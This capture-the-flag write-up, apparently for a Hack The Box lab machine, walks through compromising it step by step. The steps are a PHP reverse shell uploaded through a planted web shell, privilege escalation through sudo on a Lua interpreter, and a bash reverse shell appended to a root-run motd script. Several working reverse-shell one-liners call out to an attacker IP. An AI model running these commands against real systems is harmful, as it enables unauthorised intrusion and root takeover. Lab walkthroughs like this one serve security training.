The process begins by finding a reverse shell present on the box to get a reverse shell. Then, it involves pivoting to another user to own user using Lua. Finally, by exploiting a cleanup script running as root, we can obtain the root shell.
Nmap scan
Usually I start with nmap scan
nmap -sV -sC 10.10.10.181 -v
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We have ssh and web ports open.
Web enumeration
Checking the website:
Seems like we have something to do with web reverse shell.
Running dirbuster didn't return anything useful so I've took a look at the page source:
<body>
<center>
<h1>This site has been owned</h1>
<h2>I have left a backdoor for all the net. FREE INTERNETZZZ</h2>
<h3> - Xh4H - </h3>
<!--Some of the best web shells that you might need ;)-->
</center>
</body>
Xh4H (the box creator) with a hint : Some of the best web shells that you might need.
Searching for : Xh4H web shells, I've found a tweet that lead to a list of reverse shell created by this user.
By trying each one against the box URL , smevk.php worked!
Going to: http://10.10.10.181/smevk.php
It’s a login page, trying default creds (admin:admin
) allowed me to login.
Getting first shell
There is a browse option. As we know that php is allowed, let’s upload a simple php reverse shell
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.81/1234 0>&1'");
?>
Save it as rev.php and browse for it then click on the >> symbol to upload the shell.
Now rev.php appears into the file manager.
Listen to port 1234 (don’t forget to change the ip and port in the rev.php)
rlwrap nc -vlp 1234
To execute the reverse shell, just visit http://10.10.10.181/rev.php
And got a shell back!
Own user
Before doing any work, it's better to upgrade the shell first:
python -c 'import pty;pty.spawn("/bin/bash")'
Enumeration
By searching in the home dir of the webadmin user, I've found a note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
It’s a message from the sysadmin user , looks like I can use a tool to execute a lua code.
Running sudo -l reveals that webadmin can execute the luvit binary without password as sysadmin.
After searching for how to execute system command using lua, I was able to find a simple way to execute lua command.
Creating a lua shell:
echo "local t = os.execute('/bin/sh')" > rev.lua
Now executing the command:
sudo -u sysadmin /home/sysadmin/luvit rev.lua
Got a shell as user sysadmin!
Own root
Enumeration
Pspy64 shows a command running as root. The system copies the files in /var/backups/.update-motd.d/ to /etc/update-motd.d/ every 30 seconds.
After a while , I've noticed that is executed on every ssh login, and the command in 00-header will be executed as root.
Get a shell as root
I've added a bash reverse shell to 00-header:
echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.16.81/4444 0>&1'" >> /etc/update-motd.d/00-header
Listening on port 4444 and ssh to the box from another terminal returned a root shell:
Finally the box is rooted :) . Your feedback is appreciated !